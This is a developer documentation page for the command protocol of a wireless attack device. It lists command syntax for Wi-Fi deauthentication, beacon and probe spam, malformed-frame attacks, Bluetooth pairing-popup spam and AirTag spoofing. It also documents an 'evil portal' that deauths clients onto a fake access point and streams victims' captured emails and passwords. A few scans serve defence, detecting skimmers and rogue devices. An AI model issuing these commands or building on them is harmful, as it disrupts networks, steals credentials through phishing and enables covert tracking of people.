Home > 3rd-Party Integration > Commands Reference

Commands Reference

The full set of commands a client can send over the Command characteristic, organized by category. For each command this page documents the wire format, the expected RSP, and any DATA records the device emits while the operation is running.

Start anywhere, stop universally. Every long-running scan and attack is stopped with the same command: CMD:stopscan:. Every command receives RSP:<command>:OK within 100 ms whether or not the operation has actually begun. Treat RSP as “accepted” and watch STATUS: for the real state change. See GATT Reference for the full message-framing rules.


Conventions

Every command follows the same wire format:

CMD:<command>:[param=value[,param=value...]]

The trailing colon after the command name is always present, even when no parameters are supplied (CMD:stopscan:). Multi-value parameters use semicolons inside the value to separate entries (targets=AA:BB:CC:DD:EE:FF,6;11:22:33:44:55:66,11).

Typical reply flow for a long-running command:

-> CMD:<command>:...
<- RSP:<command>:OK                  (within 100 ms)
<- STATUS:2:<text>                   (operation actually begins)
<- DATA:...                          (live records, if applicable)
<- STATUS:1:Ready                    (after CMD:stopscan: or natural end)

A RSP:<command>:ERROR[:reason] instead of OK means the command was rejected. The reason text, when present, describes why.


WiFi Scanning

WiFi scans stream DATA: records as networks, stations, and frames are observed. Each scan is started with the listed command and stopped with CMD:stopscan:.

Access-point scan

CMD:scanap:
Field Value
RSP RSP:scanap:OK
STATUS STATUS:2:Scanning...
DATA DATA:AP:SSID,BSSID,Channel,RSSI[,Security]

Security reports the network’s security type. Possible values: [OPEN], [WEP], [WPA_PSK], [WPA2_PSK], [WPA_WPA2_PSK], [WPA2_ENTERPRISE], [WPA3_PSK], [WPA3_ENTERPRISE], [WPA2_WPA3_PSK], [WAPI_PSK], [UNDEFINED]. _PSK tokens are Personal (pre-shared key) networks; _ENTERPRISE tokens are 802.1X/EAP networks; WPA3 indicates SAE. Mixed tokens (e.g. [WPA_WPA2_PSK], [WPA2_WPA3_PSK]) indicate transition-mode networks that advertise both generations.

Station scan

CMD:scansta:

Discovers stations associated with previously-scanned APs. Run scanap first.

Field Value
RSP RSP:scansta:OK
DATA DATA:STA:ClientMAC,ConnectedBSSID,Channel,RSSI

Combined AP and station scan

CMD:scanall:

Emits both DATA:AP: and DATA:STA: records on the same stream.

Probe-request sniff

CMD:sniffprobe:
Field Value
DATA DATA:PROBE:ClientMAC,RequestedSSID,Channel,RSSI

Empty RequestedSSID indicates a broadcast probe.

Beacon sniff

CMD:sniffbeacon:
Field Value
DATA DATA:BEACON:SSID,BSSID,Channel,RSSI,Security

Deauth sniff

CMD:sniffdeauth:
Field Value
DATA DATA:DEAUTH:SourceMAC,DestMAC,BSSID,Channel,RSSI,Type

Type is deauth or disassoc. Broadcast destination FF:FF:FF:FF:FF:FF typically indicates an active attack.

Packet statistics

CMD:packetcount:
Field Value
DATA DATA:STATS:Beacons,Probes,Deauths,Data,EAPOL,MinRSSI,MaxRSSI

Updates every five seconds. Counters are cumulative since the scan started.

Pwnagotchi detection

CMD:sniffpwn:
Field Value
DATA DATA:PWN:Name,MAC,Channel,RSSI,Identity,Pwnd

Identity is the literal string pwnagotchi; Pwnd is the network-capture count the device claims.

Pineapple detection

CMD:sniffpinescan:
Field Value
DATA DATA:PINE:SSID,MAC,Channel,RSSI,DetectionType

DetectionType: SUSP_OUI, TAG+SUSP_CAP, or OTHER.

Channel analyzer

CMD:channelanalyze:
Field Value
DATA DATA:CHANACT:...

Channel-activity samples emitted every 500 ms.


WiFi Attacks

All WiFi attacks share CMD:attack:type=<attack>[,...], return RSP:attack:OK, and emit DATA:ATTACK:<type>,PacketsSent,TargetCount,DurationSeconds every two seconds while running. Stop with CMD:stopscan:.

Deauthentication

CMD:attack:type=deauth,mode=<basic|targeted|manual>,targets=<list>
Mode Target format (one entry; semicolons separate multiple)
basic BSSID,Channel. Broadcasts deauth to the AP.
targeted StationMAC,APBSSID,Channel. Deauths a specific station.
manual SourceMAC,DestMAC,Channel. Custom source and destination.

Maximum 25 targets per command. Band is inferred from channel (1-14 = 2.4 GHz, 36+ = 5 GHz); mixed-band lists are allowed.

DATA: DATA:ATTACK:deauth,PacketsSent,TargetCount,DurationSeconds

Beacon spam

CMD:attack:type=beacon,mode=<random|list|aplist|funny>[,ssids=SSID1;SSID2;...]
Mode Behavior
random Continuously generated random SSIDs
list Broadcasts the SSIDs in the ssids parameter
aplist Clones the SSIDs in the ssids parameter
funny Built-in humorous SSID list

If an SSID contains a comma, replace it with _ before sending.

DATA: DATA:ATTACK:beacon,BeaconsSent,SSIDCount,DurationSeconds

Rick Roll

CMD:attack:type=rickroll

Beacon spam with built-in Rick Astley lyrics as SSIDs. DATA matches beacon spam with SSIDCount=8.

Probe-request spam

CMD:attack:type=probe,targets=SSID,BSSID,Channel;SSID,BSSID,Channel;...

DATA: DATA:ATTACK:probe,ProbesSent,TargetCount,DurationSeconds

Bad message

CMD:attack:type=badmsg[,targeted=true],targets=StationMAC,APBSSID,Channel,APSSID;...

Sends malformed association frames. targeted=true marks targets explicitly; default is broadcast to all provided stations.

DATA: DATA:ATTACK:badmsg,PacketsSent,TargetCount,DurationSeconds

Association sleep

CMD:attack:type=sleep[,targeted=true],targets=StationMAC,APBSSID,Channel,APSSID;...

Sends association frames with power-management flags to force stations into power-saving mode. Same parameter shape as badmsg.

DATA: DATA:ATTACK:sleep,PacketsSent,TargetCount,DurationSeconds


Bluetooth Scanning

All BT scans return RSP:sniffbt:OK (or RSP:sniffskim:OK) followed by STATUS:2:Scan started: <type>. Stop with CMD:stopscan:.

General BT discovery

CMD:sniffbt:type=all

The type parameter may be omitted (CMD:sniffbt: is equivalent).

Field Value
DATA DATA:BT:DeviceName,MAC,RSSI,Type

Type is BLE, Classic, or Unknown.

AirTag scan

CMD:sniffbt:type=airtag
Field Value
DATA DATA:BT:AirTag,MAC,RSSI,BLE,PayloadHex

PayloadHex is the 22-byte public-key advertisement that uniquely identifies the AirTag across MAC rotations. Store this if you intend to spoof the AirTag later.

Flipper Zero scan

CMD:sniffbt:type=flipper
Field Value
DATA DATA:BT:FlipperName,MAC,RSSI,BLE

Flock scan

CMD:sniffbt:type=flock
Field Value
DATA DATA:BT:FlockName,MAC,RSSI,BLE

For the full Flock classification surface (including 2.4 GHz Wi-Fi-side matches), use CMD:wardriveall: instead. See Wardrive Integration.

Credit-card skimmer scan

CMD:sniffskim:
Field Value
DATA DATA:BT:SkimmerSignature,MAC,RSSI,Type

Matches known Bluetooth modules commonly used in skimming devices (HC-05, HC-06, etc.).


Bluetooth Attacks

All BT attacks share CMD:attack:type=bt_<variant>, return RSP:attack:OK followed by STATUS:2:Attack started: bt_<variant>, and emit DATA:ATTACK:bt_<variant>,PacketsSent,VariantCount,DurationSeconds every two seconds. Stop with CMD:stopscan:.

Command Target / behavior
CMD:attack:type=bt_apple Spoofs Apple Continuity adverts (iOS pairing popup spam)
CMD:attack:type=bt_windows Spoofs Windows Swift Pair adverts
CMD:attack:type=bt_samsung Spoofs Samsung pairing adverts
CMD:attack:type=bt_google Spoofs Google Fast Pair adverts (Android)
CMD:attack:type=bt_flipper Spoofs Flipper Zero adverts
CMD:attack:type=bt_all Cycles through all five variants on a single dwell timer

AirTag spoof

CMD:attack:type=bt_airtag,payload=<PayloadHex>

Alternate identifiers:

Parameter Use
payload=<hex> Preferred. The 22-byte public key captured from a prior AirTag scan; works across MAC rotations
mac=AA:BB:CC:DD:EE:FF Looks up the payload by MAC in the device’s last-scan list
target=<index> Legacy index into the last-scan list

payload takes priority over mac, which takes priority over target.

DATA: DATA:ATTACK:bt_airtag,PacketsSent,1,DurationSeconds


Evil Portal

The evil-portal surface manages a small library of captive-portal HTML files stored on the device, runs the portal attack, and streams captured credentials in real time.

List local portals

CMD:portallist:
Field Value
RSP RSP:portallist:OK
DATA DATA:PORTALLIST:{"portals":[{"name":"...","file":"...","size":...},...]}

Fetch remote manifest

CMD:portalremote:ssid=<wifi>,password=<password>

Connects to the named Wi-Fi network and downloads the manifest of portals available on the upstream server.

Field Value
RSP RSP:portalremote:OK or RSP:portalremote:ERROR:WiFi connection failed
DATA DATA:PORTALLIST:{"files":[{"name":"...","filename":"..."},...]}

Download a portal

CMD:portaldownload:ssid=<wifi>,password=<password>,file=<Filename.html>
Field Value
RSP RSP:portaldownload:OK
STATUS STATUS:2:Connecting to WiFi..., then STATUS:3:Portal downloaded

Possible errors: WiFi connection failed, Portal not found on server, Storage full, Portal exceeds 30KB limit.

Delete a portal

CMD:portaldelete:file=<Filename.html>

RSP:portaldelete:OK or RSP:portaldelete:ERROR:Delete failed.

Start the attack

CMD:portalstart:ssid=<SSID>,bssid=<BSSID>,channel=<n>,file=<Filename.html>[,deauth=true]
Parameter Use
ssid SSID the fake AP will broadcast
bssid Target AP for the optional deauth
channel Wi-Fi channel to operate on
file Portal HTML file (must already be present locally)
deauth When true, deauths clients off the target AP to drive them toward the fake one
Field Value
RSP RSP:portalstart:OK
STATUS STATUS:2:Evil Portal active

Possible errors: Missing file parameter, Portal not found.

Stop the attack

CMD:portalstop:

RSP:portalstop:OK.

Captured credentials

CMD:portalcreds:
Field Value
RSP RSP:portalcreds:OK
DATA One DATA:CRED:portal_file,email,password line per stored entry

Captured credentials also arrive in real time as a victim submits a form. A DATA:CRED: line is emitted immediately whether or not the client has issued portalcreds.

Clear captured credentials

CMD:portalclearcreds:

RSP:portalclearcreds:OK or RSP:portalclearcreds:ERROR:Clear failed. Storage cap is 100 entries, FIFO. Oldest entries are evicted automatically.


Universal stop

CMD:stopscan:

Stops any running scan, attack, wardrive, or evil-portal session.

Field Value
RSP RSP:stopscan:OK
STATUS STATUS:1:Ready (lands a few hundred ms after RSP)

Treat STATUS:1:Ready as the actual “operation finished” signal. Buffered DATA: records may still arrive between the RSP and the STATUS.